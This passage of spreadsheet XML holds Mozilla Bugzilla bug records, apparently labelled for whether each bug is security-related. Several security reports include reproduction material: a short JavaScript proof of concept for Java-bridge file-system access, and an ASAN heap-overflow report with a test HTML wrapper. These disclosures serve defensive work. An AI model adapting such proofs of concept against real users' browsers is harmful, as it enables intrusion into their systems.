          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I321" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J321" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K321" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L321" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M321" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N321" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O321" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P321" t="inlineStr"/>
      <c r="Q321" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R321" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S321" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T321" t="n">
        <v>1</v>
      </c>
      <c r="U321" t="n">
        <v>0</v>
      </c>
      <c r="V321" t="n">
        <v>12</v>
      </c>
      <c r="W321" t="inlineStr">
        <is>
          <t>Beginning last week, :atoll turned on HTTP 2 for bugzilla-dev,
and started asking me a bunch of questions about where and when we could use caching headers.
We covered lot of ground (and there are bugs already filed for the specifics of caching) but one thing that keeps coming up is that the way we handle CSS and JS files is problematic. Basically, there are two problems:
1) Filenames are not deterministic (they change, every push, even if none of the css or js files change)
2) They're stored in NFS, because they're generated at runtime
For testing HTTP 2 on dev, we disabled asset concatenation and this itself was promising. Following that, I put together an experimental branch:
https://github.com/dylanwh/bmo/tree/new-assets
In this case, all js, css, image and even font files get a content-addressable filename. This means we can use a cache-control max age of forever (and, even Cache-Control: immutable)
However, this still lacks asset concatenation.
Fortunately, I have a plan for that: Pre-concatenate combinations of files that I know ahead of time will be needed at the same time. For any combination (order-dependent) that is not listed, we fall back to individual files.
Some of the benefits from this are:
1) Deployment to cloud-services becomes easier (one less thing to use the shared NFS filesystem!)
2) Predictable builds -- the asset files can be known ahead of time
3) Better caching</t>
        </is>
      </c>
      <c r="X321" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" t="n">
        <v>35591</v>
      </c>
      <c r="B322" t="inlineStr">
        <is>
          <t>2000-04-12 08:30:24 -0700</t>
        </is>
      </c>
      <c r="C322" t="inlineStr">
        <is>
          <t>nothing works on the 3 pane toolbar, JS exception dumped to console.</t>
        </is>
      </c>
      <c r="D322" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E322" t="n">
        <v>1</v>
      </c>
      <c r="F322" t="n">
        <v>1</v>
      </c>
      <c r="G322" t="n">
        <v>2</v>
      </c>
      <c r="H322" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I322" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J322" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K322" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L322" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M322" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N322" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O322" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P322" t="inlineStr"/>
      <c r="Q322" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R322" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S322" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T322" t="n">
        <v>1</v>
      </c>
      <c r="U322" t="n">
        <v>0</v>
      </c>
      <c r="V322" t="n">
        <v>7</v>
      </c>
      <c r="W322" t="inlineStr">
        <is>
          <t>more details in a second.</t>
        </is>
      </c>
      <c r="X322" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" t="n">
        <v>435521</v>
      </c>
      <c r="B323" t="inlineStr">
        <is>
          <t>2008-05-23 18:57:22 -0700</t>
        </is>
      </c>
      <c r="C323" t="inlineStr">
        <is>
          <t>Crash in [@ GeckoNSMenu performKeyEquivalent] when rapidly cycling DM window</t>
        </is>
      </c>
      <c r="D323" t="inlineStr">
        <is>
          <t>2012-02-22 17:11:19 -0800</t>
        </is>
      </c>
      <c r="E323" t="n">
        <v>1</v>
      </c>
      <c r="F323" t="n">
        <v>1</v>
      </c>
      <c r="G323" t="n">
        <v>3</v>
      </c>
      <c r="H323" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I323" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J323" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K323" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L323" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M323" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N323" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O323" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P323" t="inlineStr"/>
      <c r="Q323" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R323" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S323" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T323" t="n">
        <v>1</v>
      </c>
      <c r="U323" t="n">
        <v>0</v>
      </c>
      <c r="V323" t="n">
        <v>25</v>
      </c>
      <c r="W323" t="inlineStr">
        <is>
          <t>Seen while testing Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0.
STR:
1. Populate Download Manager with about 50-60 downloads.
2. While the list is loading rapidly press the Command and J key.
3. Crash. Report is http://crash-stats.mozilla.com/report/index/36f8be63-292d-11dd-9874-001a4bd46e84?p=1
I may have been holding down the Command J and rapidly pressing the J key, but I am not 100% sure.</t>
        </is>
      </c>
      <c r="X323" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" t="n">
        <v>1358069</v>
      </c>
      <c r="B324" t="inlineStr">
        <is>
          <t>2017-04-20 02:43:45 -0700</t>
        </is>
      </c>
      <c r="C324" t="inlineStr">
        <is>
          <t>unable to post bug on bugzilla for product support.bugzilla.org - Lithium - required "Version" input but Version field absent</t>
        </is>
      </c>
      <c r="D324" t="inlineStr">
        <is>
          <t>2017-04-26 14:22:24 -0700</t>
        </is>
      </c>
      <c r="E324" t="n">
        <v>1</v>
      </c>
      <c r="F324" t="n">
        <v>1</v>
      </c>
      <c r="G324" t="n">
        <v>7</v>
      </c>
      <c r="H324" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I324" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J324" t="inlineStr">
        <is>
          <t>Bug Creation/Editing</t>
        </is>
      </c>
      <c r="K324" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L324" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M324" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N324" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O324" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P324" t="inlineStr"/>
      <c r="Q324" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R324" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S324" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T324" t="n">
        <v>1</v>
      </c>
      <c r="U324" t="n">
        <v>0</v>
      </c>
      <c r="V324" t="n">
        <v>9</v>
      </c>
      <c r="W324" t="inlineStr">
        <is>
          <t>Created attachment 8859946
BugzillaAttempSelectPlatformVersionProblem.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20170323105023
Steps to reproduce:
selected product: support.mozilla.org - Lithium
selected component: Knowlege Base Software
Actual results:
Was able to enter all the info required on the input screen, but when I clicked "Submit Bug" I got a screen that insisted I provide OS version.  Went back to input screen and could not find a field to enter this data.  "Version" input field is absent.
Expected results:
Once I entered all the required data on all available inputs, I should have been able to click on Submit Bug and successfully post the bug.</t>
        </is>
      </c>
      <c r="X324" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" t="n">
        <v>90518</v>
      </c>
      <c r="B325" t="inlineStr">
        <is>
          <t>2001-07-12 11:17:00 -0700</t>
        </is>
      </c>
      <c r="C325" t="inlineStr">
        <is>
          <t>distributed stress test broken</t>
        </is>
      </c>
      <c r="D325" t="inlineStr">
        <is>
          <t>2002-02-04 18:41:27 -0800</t>
        </is>
      </c>
      <c r="E325" t="n">
        <v>1</v>
      </c>
      <c r="F325" t="n">
        <v>1</v>
      </c>
      <c r="G325" t="n">
        <v>3</v>
      </c>
      <c r="H325" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I325" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J325" t="inlineStr">
        <is>
          <t>Test</t>
        </is>
      </c>
      <c r="K325" t="inlineStr">
        <is>
          <t>3.2.1</t>
        </is>
      </c>
      <c r="L325" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M325" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N325" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O325" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P325" t="inlineStr"/>
      <c r="Q325" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R325" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S325" t="inlineStr">
        <is>
          <t>3.4</t>
        </is>
      </c>
      <c r="T325" t="n">
        <v>1</v>
      </c>
      <c r="U325" t="n">
        <v>0</v>
      </c>
      <c r="V325" t="n">
        <v>39</v>
      </c>
      <c r="W325" t="inlineStr">
        <is>
          <t>the test needs to be run before NSS 3.4 is released. This is a manual run test,
the scripts ave to be adjusted, and the output needs to be examined. It does not
need to run before 3.3.
Documentation how to run and adjust this test needs to be checked in to tests/doc
Problems: still no progress on the static IP address issue - can not run on any
machine but clio
bugs: 200 stress certs don't get generated
testresults/security/HOSTDIR does not get created
this is most likely a result of the cleanup in the ssl script, or the init
script, which get sourced</t>
        </is>
      </c>
      <c r="X325" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" t="n">
        <v>671756</v>
      </c>
      <c r="B326" t="inlineStr">
        <is>
          <t>2011-07-14 20:48:42 -0700</t>
        </is>
      </c>
      <c r="C326" t="inlineStr">
        <is>
          <t>crash via mozilla::gl::GLContext::UploadSurfaceToTexture on mac playing a video</t>
        </is>
      </c>
      <c r="D326" t="inlineStr">
        <is>
          <t>2011-09-22 16:09:01 -0700</t>
        </is>
      </c>
      <c r="E326" t="n">
        <v>1</v>
      </c>
      <c r="F326" t="n">
        <v>1</v>
      </c>
      <c r="G326" t="n">
        <v>3</v>
      </c>
      <c r="H326" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I326" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J326" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K326" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L326" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M326" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N326" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O326" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P326" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q326" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R326" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S326" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T326" t="n">
        <v>1</v>
      </c>
      <c r="U326" t="n">
        <v>0</v>
      </c>
      <c r="V326" t="n">
        <v>6</v>
      </c>
      <c r="W326" t="inlineStr">
        <is>
          <t>Playing the video at https://browserid.org/users reliably crashes my MacOSX nightly build. Crash address looks random, so this might be exploitable.
https://crash-stats.mozilla.com/report/index/bp-a32bd99f-d985-46f4-ba3f-7ce132110714</t>
        </is>
      </c>
      <c r="X326" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" t="n">
        <v>158474</v>
      </c>
      <c r="B327" t="inlineStr">
        <is>
          <t>2002-07-20 08:05:46 -0700</t>
        </is>
      </c>
      <c r="C327" t="inlineStr">
        <is>
          <t>Abstract out GenerateSQL into perl module</t>
        </is>
      </c>
      <c r="D327" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:31 -0800</t>
        </is>
      </c>
      <c r="E327" t="n">
        <v>1</v>
      </c>
      <c r="F327" t="n">
        <v>1</v>
      </c>
      <c r="G327" t="n">
        <v>4</v>
      </c>
      <c r="H327" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I327" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J327" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K327" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L327" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M327" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N327" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O327" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P327" t="inlineStr"/>
      <c r="Q327" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R327" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S327" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T327" t="n">
        <v>1</v>
      </c>
      <c r="U327" t="n">
        <v>0</v>
      </c>
      <c r="V327" t="n">
        <v>13</v>
      </c>
      <c r="W327" t="inlineStr">
        <is>
          <t>The function GenerateSQL() in buglist.cgi turns a URL into an SQL query. This
ability is needed for both generic reporting (bug 12282) and generic charting
(bug 16009). The plan is to move this function into a perl module, Search.pm, so
this module can be used by all the CGIs which need this ability.</t>
        </is>
      </c>
      <c r="X327" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" t="n">
        <v>595300</v>
      </c>
      <c r="B328" t="inlineStr">
        <is>
          <t>2010-09-10 12:53:15 -0700</t>
        </is>
      </c>
      <c r="C328" t="inlineStr">
        <is>
          <t>Update to NSS_3_12_8_RTM in mozilla-central</t>
        </is>
      </c>
      <c r="D328" t="inlineStr">
        <is>
          <t>2010-11-24 10:51:45 -0800</t>
        </is>
      </c>
      <c r="E328" t="n">
        <v>1</v>
      </c>
      <c r="F328" t="n">
        <v>1</v>
      </c>
      <c r="G328" t="n">
        <v>3</v>
      </c>
      <c r="H328" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I328" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J328" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K328" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M328" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N328" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O328" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P328" t="inlineStr">
        <is>
          <t>[sg:nse meta]</t>
        </is>
      </c>
      <c r="Q328" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R328" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S328" t="inlineStr">
        <is>
          <t>mozilla2.0b7</t>
        </is>
      </c>
      <c r="T328" t="n">
        <v>1</v>
      </c>
      <c r="U328" t="n">
        <v>0</v>
      </c>
      <c r="V328" t="n">
        <v>15</v>
      </c>
      <c r="W328" t="inlineStr">
        <is>
          <t>mozilla-central is using NSS_3_12_8_BETA2.  I'd like to
update to NSS_3_12_8_BETA3.  I summarize the changes between
Beta 2 and Beta 3 below for Mozilla drivers.
Bug fixes of interest to Mozilla:
- Bug 578697: (CVE-2010-3170) Browser Wildcard Certificate Validation Issue
- Bug 582575: Add July 2010 batch of roots to NSS
- Bug 536640: valgrind warning in DecodeItem (about uninitialized local from
  nsslowkey_DecodePW)
- Bug 588698: SSL deadlock (seen in Thunderbird)
- Bug 567134: Use ASLR in NSS if it's available
Other important bug fixes:
- Bug 587234: Better error reporting and checks for weak server keys in libSSL
- Bug 585842: CERT_MakeCANickname returns static string in error case
- Bug 586953: CERT_FormatName leaks everything if it can't PORT_Alloc for buf
- Bug 586957: CERT_FormatName leaks things if properties exist multiple times
- Bug 586967: CERT_CreateCertificate leaks arena if PORT_ArenaZAlloc fails
- Bug 587399: crmf_copy_cert_req_msg leaks poolp if newReqMsg = PORT_ArenaZNew
  fails
- Bug 588052: nsslowhash.h missing from dist/public/nss
- Bug 587622: print_attr_value calls get_obj_class instead of get_key_type for
  CKA_KEY_TYPE
- Bug 584871: calling SEC_PKCS12DecoderStart with NULL dOpen, dClose, dRead,
  dWrite, dArg leads to leaks
- Bug 584875: Contents of sec_PKCS12EncoderContext are only freed on error
  handling case.
- Bug 587432: NSS_CMSSignerInfo_Sign leaks tmppoolp when things fail
- Bug 586697: ssl3_DeriveMasterSecret must not request pVersion when it does
  Master key derivation for Diffie-Hellman through pkcs11
- Bug 525092: Allow one more SSL function to be called early
Minor bug fixes:
- Bug 585247: NSS coreconf: Add -rpath-link to LDFLAGS for Maemo/Scratchbox
- Bug 586857: Mark SEC_OID_NS_CERT_EXT_SSL_SERVER_NAME as an unsupported
  certificate extension
- Bug 587393: remove JAR_cert_attribute declaration</t>
        </is>
      </c>
      <c r="X328" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" t="n">
        <v>634724</v>
      </c>
      <c r="B329" t="inlineStr">
        <is>
          <t>2011-02-16 13:42:19 -0800</t>
        </is>
      </c>
      <c r="C329" t="inlineStr">
        <is>
          <t>JEP allows almost full local-user access to file system via java.io.FileSystem object</t>
        </is>
      </c>
      <c r="D329" t="inlineStr">
        <is>
          <t>2017-07-06 02:13:30 -0700</t>
        </is>
      </c>
      <c r="E329" t="n">
        <v>1</v>
      </c>
      <c r="F329" t="n">
        <v>1</v>
      </c>
      <c r="G329" t="n">
        <v>6</v>
      </c>
      <c r="H329" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I329" t="inlineStr">
        <is>
          <t>Plugins Graveyard</t>
        </is>
      </c>
      <c r="J329" t="inlineStr">
        <is>
          <t>Java (Java Embedding Plugin)</t>
        </is>
      </c>
      <c r="K329" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L329" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M329" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N329" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O329" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P329" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q329" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R329" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S329" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T329" t="n">
        <v>1</v>
      </c>
      <c r="U329" t="n">
        <v>0</v>
      </c>
      <c r="V329" t="n">
        <v>17</v>
      </c>
      <c r="W329" t="inlineStr">
        <is>
          <t>Created attachment 512905
PoC -- enable Java
Apple's Product Security Team contacted us with the following report:
I work for Apple's Product Security team. We have discovered a vulnerability in the JEP or LiveConnect java bridge in Firefox. We initially investigated this as a bug in the Java distribution, but it now seems to be a Mozilla-specific problem. Therefore I'm giving you the proof-of-concept so that you can investigate further.
===== javafs.html =======
&lt;script&gt;
document.write('Free disk space: ' + java.io.FileSystem.getFileSystem().getSpace(new java.io.File('/'), 0));
&lt;/script&gt;
===== cut =======
1. Put javafs.html (contents per the above) on a web server.
2. Visit that page in Firefox.
3. Note how the script was permitted to get a reference to the java.io.FileSystem class, even though it is declared package-local.
I reproduced the issue with Firefox 3.6.13.</t>
        </is>
      </c>
      <c r="X329" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" t="n">
        <v>1146101</v>
      </c>
      <c r="B330" t="inlineStr">
        <is>
          <t>2015-03-22 02:00:57 -0700</t>
        </is>
      </c>
      <c r="C330" t="inlineStr">
        <is>
          <t>"Assertion failure: false (destroying Text style struct still present in style context tree)"</t>
        </is>
      </c>
      <c r="D330" t="inlineStr">
        <is>
          <t>2016-07-02 10:39:46 -0700</t>
        </is>
      </c>
      <c r="E330" t="n">
        <v>1</v>
      </c>
      <c r="F330" t="n">
        <v>1</v>
      </c>
      <c r="G330" t="n">
        <v>3</v>
      </c>
      <c r="H330" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I330" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J330" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K330" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L330" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M330" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N330" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O330" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P330" t="inlineStr">
        <is>
          <t>[adv-main38+]</t>
        </is>
      </c>
      <c r="Q330" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R330" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S330" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T330" t="n">
        <v>1</v>
      </c>
      <c r="U330" t="n">
        <v>0</v>
      </c>
      <c r="V330" t="n">
        <v>25</v>
      </c>
      <c r="W330" t="inlineStr">
        <is>
          <t>Created attachment 8581253
testcase
1. Set:
     user_pref("layout.css.expensive-style-struct-assertions.enabled", true);
2. Load the testcase
style struct 0x12f319ed8 found on style context 0x12f35ed98
  in a.html
Assertion failure: false (destroying Text style struct still present in style context tree), at ./nsStyleStructList.h:71</t>
        </is>
      </c>
      <c r="X330" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" t="n">
        <v>966311</v>
      </c>
      <c r="B331" t="inlineStr">
        <is>
          <t>2014-01-31 09:09:23 -0800</t>
        </is>
      </c>
      <c r="C331" t="inlineStr">
        <is>
          <t>Out-of-bounds read in mozilla::WaveReader::DecodeAudioData()</t>
        </is>
      </c>
      <c r="D331" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:30 -0700</t>
        </is>
      </c>
      <c r="E331" t="n">
        <v>1</v>
      </c>
      <c r="F331" t="n">
        <v>1</v>
      </c>
      <c r="G331" t="n">
        <v>3</v>
      </c>
      <c r="H331" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I331" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J331" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K331" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L331" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M331" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N331" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O331" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P331" t="inlineStr">
        <is>
          <t>[adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q331" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R331" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S331" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T331" t="n">
        <v>1</v>
      </c>
      <c r="U331" t="n">
        <v>0</v>
      </c>
      <c r="V331" t="n">
        <v>20</v>
      </c>
      <c r="W331" t="inlineStr">
        <is>
          <t>Created attachment 8368639
repro-file
Tested on:
OS: Ubuntu  12.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1391177067/
Repro-file as attachment. You might need to load the wav-file with a small html wrapper like this:
&lt;html&gt;
&lt;audio src="./repro-file.wav"&gt;
&lt;/html&gt;
ASAN-report:
==20648==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6210005bdd00 at pc 0x7f84654da535 bp 0x7f843c70dc40 sp 0x7f843c70dc38
READ of size 1 at 0x6210005bdd00 thread T37 (Media Decode)
    #0 0x7f84654da534 in mozilla::(anonymous namespace)::ReadUint8(char const**) /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/wave/WaveReader.cpp:106:0
    #1 0x7f84654d9f0b in mozilla::WaveReader::DecodeAudioData() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/wave/WaveReader.cpp:219:0
    #2 0x7f84653d35d2 in mozilla::MediaDecoderReader::DecodeToFirstAudioData() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderReader.cpp:449:0
    #3 0x7f84653d3a91 in mozilla::MediaDecoderReader::FindStartTime(long&amp;) /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderReader.cpp:474:0
    #4 0x7f84653f452f in mozilla::MediaDecoderStateMachine::FindStartTime() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderStateMachine.cpp:2653:0
    #5 0x7f84653e6e56 in mozilla::MediaDecoderStateMachine::DecodeMetadata() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderStateMachine.cpp:1949:0
    #6 0x7f84653e64c4 in mozilla::MediaDecoderStateMachine::DecodeThreadRun() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderStateMachine.cpp:508:0
    .
    .
    .
0x6210005bdd00 is located 0 bytes to the right of 4096-byte region [0x6210005bcd00,0x6210005bdd00)
allocated by thread T37 (Media Decode) here:
    #0 0x4463c5 in malloc _asan_rtl_:0
    #1 0x7f846c8d876d in moz_xmalloc /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/memory/mozalloc/mozalloc.cpp:52:0
    #2 0x7f84654d9dd7 in operator new[](unsigned long) /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/obj-firefox/content/media/wave/../../../dist/include/mozilla/mozalloc.h:213:0
    #3 0x7f84654d9dd7 in mozilla::WaveReader::DecodeAudioData() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/wave/WaveReader.cpp:207:0
    #4 0x7f84653d35d2 in mozilla::MediaDecoderReader::DecodeToFirstAudioData() /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderReader.cpp:449:0
    #5 0x7f84653d3a91 in mozilla::MediaDecoderReader::FindStartTime(long&amp;) /builds/slave/m-cen-l64-asan-d-ntly-00000000/build/content/media/MediaDecoderReader.cpp:474:0
    .
    .
    .</t>
        </is>
      </c>
      <c r="X331" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" t="n">
        <v>1249365</v>
      </c>
      <c r="B332" t="inlineStr">
        <is>
          <t>2016-02-18 11:06:21 -0800</t>
        </is>
      </c>
      <c r="C332" t="inlineStr">
        <is>
          <t>Latest Nightly 47.0a1 breaks Hello - No camera/microphone found</t>
        </is>
      </c>
      <c r="D332" t="inlineStr">
        <is>
          <t>2016-07-08 18:34:34 -0700</t>
        </is>
      </c>
      <c r="E332" t="n">
        <v>1</v>
      </c>
      <c r="F332" t="n">
        <v>1</v>
      </c>
      <c r="G332" t="n">
        <v>3</v>
      </c>
      <c r="H332" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I332" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J332" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
